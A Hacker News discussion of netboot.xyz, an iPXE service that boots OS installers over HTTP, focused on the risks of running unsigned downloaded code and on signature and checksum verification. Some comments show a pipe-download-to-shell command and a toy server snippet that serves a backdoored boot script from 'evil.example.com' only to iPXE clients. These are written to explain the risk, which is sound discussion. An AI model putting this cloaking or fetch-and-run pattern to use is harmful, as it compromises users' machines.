Hacker News
Netboot (netboot.xyz)
214 points by p4bl0 on Jan 18, 2016 | 44 comments



NetBooting from the internet AND over HTTP? Sign me up!

Sarcasm aside, at the very least it would have been nice to see it use iPXE's `imgtrust` and `imgverify` functionality, which I could then audit and load on to a boot medium for netboot use.
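
For anyone unfamiliar with those commands, here's a rough sketch of what an iPXE script using them could look like (the hostnames and signature paths are placeholders, not from this project; `imgtrust` requires all later images to carry valid signatures, and `imgverify` checks an image against a detached signature):

```
#!ipxe
# Require valid signatures on all subsequently executed images
imgtrust --permanent
# Fetch kernel/initrd, then verify each against a detached signature
kernel http://boot.example.com/vmlinuz
initrd http://boot.example.com/initrd.img
imgverify vmlinuz http://boot.example.com/vmlinuz.sig
imgverify initrd.img http://boot.example.com/initrd.img.sig
boot
```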


For any naysayers: there's no difference between this project and, say, HashiCorp's images. You're either using upstream, or you're not. But yeah, you probably want a cert.

To be honest, this looks like a cool project. I've always wanted a way to PXE without having to need another host on the LAN.


>at the very least it would have been nice to see it use iPXE's `imgtrust` and `imgverify` functionality

I'm not familiar with these but I saw a commit from just a couple of hours ago referencing "image trust" [1], so maybe it's in the works now following your comment?

[1]: https://github.com/antonym/netboot.xyz/commit/25910be18da219...


Running unsigned code from the internet? Have I woken up in crazy land today? When did things like this become acceptable?


Run:

sh | wget http://www...something.com/install.sh

to install something automatically! Way too many projects do it; off the top of my head: rvm and oh-my-zsh.


I think it's the other way and you need the -qO- flags.
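
Even with the flags the right way round, piping straight into sh leaves no chance to inspect anything. A sketch of the safer fetch-verify-run pattern follows; the "download" here is simulated with a local file so the example is self-contained, and in practice the first step would be `wget -qO install.sh <url>` with a checksum published by the project through a trusted channel:

```shell
set -eu
# Stand-in for: wget -qO install.sh https://example.com/install.sh
printf 'echo installed\n' > install.sh
# Pin the expected checksum (normally published out-of-band by the project)
expected=$(sha256sum install.sh | cut -d' ' -f1)
# Refuse to run anything that doesn't match the pinned hash
echo "$expected  install.sh" | sha256sum -c --quiet && sh install.sh
```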


The problem with this is that the bootloader downloads and runs the code without giving any chance to inspect it.

If you download the code manually, how are you to know that the server sent you the exact same code? They could be checking HTTP headers for a bootloader device, or might only be infecting 1 in 100 downloads. You'd never spot it.
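
To make the header-sniffing point concrete, here is a toy sketch of how a malicious server could key its response off the client's User-Agent (all strings and logic are illustrative, not from any real attack; iPXE does identify itself in its User-Agent header, while a person double-checking the URL with curl or a browser would only ever see the clean script):

```python
# Hypothetical malicious server logic: serve clean content to humans,
# a tampered script only to PXE bootloaders.
def payload_for(user_agent: str) -> bytes:
    clean = b"#!ipxe\nchain http://mirror.example.com/vmlinuz\n"
    backdoored = b"#!ipxe\nchain http://evil.example.com/vmlinuz\n"
    # Only bootloader requests get the tampered script, so manual
    # inspection of the same URL proves nothing about what the
    # bootloader actually received.
    return backdoored if "iPXE" in user_agent else clean
```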


You can always examine the code, right? https://github.com/antonym/netboot.xyz/blob/master/src/coreo... Uses official images as far as I can see.


Sure, you could compile it yourself, then host it yourself. Relying on the remote server is the problematic part.


I see. Correct.


Don't forget that many require you to use sudo.


zsh: command not found: sudo


No worse than "./configure && make && sudo make install"


It's a bit different though. autoconf/automake is mostly autogenerated and will prevent silly issues like accidental wiping of your drive (https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issue...). Released packages will often have hashes either on the website or as an additional download. With git you can verify tags (provided they're signed). You can compile and test the package inside a chroot before installing. Etc. etc.

In theory, yes, `curl | sh` is the same as configure&make is the same as downloading your initial iso image and installing the system from it. In practice they have different risks associated with them.


Sure, autoconf is generated, but often developers have to add custom rules, and do it with arcane m4 macros to boot. I think they're similarly prone to mistakes.

For nefarious purposes I actually think it's worse than the much-maligned "curl|sh" scenario. I bet a reasonable number of people will end up trying to download the script, out of curiosity if nothing else. If it's doing anything not straightforward, it would get attention. In contrast, who would notice a line added to the middle of an 8000-line auto-generated configure script?


That wasn't my point. configure doesn't prevent malicious behaviour, but it would prevent silly mistakes at install time. (unless you actively break out of macro environment)

The point is, technically there isn't anything different between `curl | sh` and installing a system from either a downloaded .iso or a mailed DVD. Both run code from untrusted sources on your computer. But in practice they're very different because of user behaviour and ability to validate data before running. There's a whole spectrum in between and configure&make is somewhere on it.


What about the AUR from Arch Linux? It's similar, but it also has different risks: Vidalia/Tor git maintainers change quite often, users are forced to add new GPG keys, and it quite often downloads source straight from git.

What about `cd /usr/ports/www/firefox && make clean install`?


If that's being run for code you've downloaded from an untrusted location, then I'd agree with you. However, almost every project that has those instructions starts with "download it from this trusted location, verify its integrity using this GPG key...".

Of course, you have to start trusting at some point. But with HTTP, you have to also trust the wifi AP, its owner, all of the routers between you and the server, DNS... At least https takes a lot of those (but not all) out of the equation, while GPG goes even further.
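
The GPG flow being described is roughly the following. This sketch is self-contained (it generates a throwaway key and signs a local file in place of a real project's release key and tarball); it assumes GnuPG 2.1+ for the `--quick-gen-key` batch syntax:

```shell
set -eu
export GNUPGHOME=$(mktemp -d)
# Throwaway key, standing in for a project's published release key
gpg --batch --pinentry-mode loopback --passphrase '' \
    --quick-gen-key 'Release Bot <bot@example.org>' default default never
echo 'release payload' > foo.tar.gz
# The publisher makes a detached signature alongside the release
gpg --batch --pinentry-mode loopback --passphrase '' \
    --detach-sign --output foo.tar.gz.sig foo.tar.gz
# Anyone holding the public key can now verify offline,
# independent of whatever network path delivered the file:
gpg --verify foo.tar.gz.sig foo.tar.gz
```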


docker?


curlpipesh.tumblr.com/


People are running untrusted code all the time. Who uses a 100% open source, reproducibly built, 100% audited OS?


The problem is that this is going over the internet. If you haven't seen what kind of problems this can cause, you should look at Moxie's sslstrip talk from DEF CON. The problem arises when other people want root access to your system, and they can now get it from a VERY simple man-in-the-middle.

Running untrusted code is one thing, running it after pulling it from the internet is an ENTIRELY different subject.


All my apt-get downloads go over the internet. All my install isos.

People download third-party Docker containers. I can't see how this is worse.


I had the exact same reaction (and friends over IRC did too), but I still find the idea quite cool: it could be implemented correctly (with signature verification or something similar).

Also, if it is just to try out a new OS in a virtual machine, I guess it is okay to use such a service :).


Yes, but you would probably want to have a local copy of all the public keys of the OSes for verification, it would have to go over HTTPS, and you would likely need some signature validation.

The idea is really cool; specifically, I'd use this for the Raspberry Pi. I hope someone does some major security maintenance on this.


Netbooting isn't new. Insecure netbooting isn't new (a la per-distro netboot install USBs). Wrapping it up into a cohesive service is, and it's awesome.

Going signed CA wouldn't be hard to do in this case at all; it's actually just part of the build process, but it only gets you to a trusted PXE+menu system. After getting into the PXE menu, a system could still hijack the upstream kernel/initrd files.

Even FreeBSD netinstall (i.e., not limited to Linux installers) is just http/ftp without any package signing. The whole ecosystem probably needs to mature some more in regards to verification that won't break downstream projects such as this.


With boot.kernel.org and netboot.me seemingly dead now, I like to see this kind of thing available again. I acknowledge the threat of downloading these boot images over the internet, but I think it is actually not that much different from downloading the ISO... from the internet. Sure, I could verify the image more easily, but I barely did this in the past. Still, the ability to verify the images would be nice.


Dev here. The project is just a bunch of iPXE scripts that understands how each distro works and routes you to their hosted bits or a trusted mirror once you select the image. I've tried to keep all of the code on Github and the Travis CI deployment out in the open for that very reason. A project like this needs to be highly visible in order to be trusted to a degree. I also have things like image verification and https support on the list of things to do.
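
For the curious, the "menu routes you to hosted bits" pattern described is roughly this shape in iPXE script (the menu entries and mirror URLs below are illustrative placeholders, not the project's actual ones):

```
#!ipxe
menu Which OS would you like to boot?
item ubuntu  Ubuntu installer
item debian  Debian installer
choose target && goto ${target}

:ubuntu
# Chain-load kernel/initrd straight from a distro mirror
kernel http://mirror.example.com/ubuntu/linux
initrd http://mirror.example.com/ubuntu/initrd.gz
boot

:debian
kernel http://mirror.example.com/debian/linux
initrd http://mirror.example.com/debian/initrd.gz
boot
```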


Combining this with IPFS.io would be interesting. See https://github.com/zignig/astralboot


I'm happy to see the PXE booting scene get a new revival. It's one of those crucial services that's often neglected. It's also not a very "sexy" place to do development in, but boy it's good to see a proper tool emerge.

Fyi, I first heard about Netboot via the cron.weekly newsletter last Sunday, it seems to be a very new project that's only just been released: http://www.cronweekly.com/issue-11/


A short idea after seeing some people complaining about the security: wouldn't it be possible to host the iPXE scripts themselves on gh-pages? That way the hosting would be completely transparent, and the .github.io domain would work over SSL.


Archlinux does the same thing for their releases.

https://releng.archlinux.org/pxeboot/


This is very cool and very useful to me as I'm currently in the process of rebuilding our infrastructure (working on OpenBSD autoinstalls at the moment). I'm gonna test this out very shortly although I'll be using it internally and not over the Internet (for what should be obvious reasons), but it will definitely simplify things for me. Thanks!


Looks similar to boot.rackspace.com.


Yeah, I originally wrote boot.rackspace.com. I built netboot.xyz based on a lot of that original code, expanded what Operating Systems and Utilities it supported, and wanted to make it a more open project for everyone to take advantage of.


Looks like the author works for Rackspace so it may be related.


This is a really neat idea, security concerns aside. I have about 5 USB drives lying around with various OS versions. Sometimes I just want to toy with something (such as Linux Mint), and this kind of thing is ideal! Thanks dev, great work!


The only thing I get from xyz domains is spam and viruses (I didn't click the link).


It is just a TLD, dude. Doesn't mean anything.


It means a lot: who is operating it and under which jurisdiction.


I've seen more legitimate users of .xyz than of .biz (which pre-New GTLDs was the go-to TLD for general awfulness...)



Sounds great


Thanks



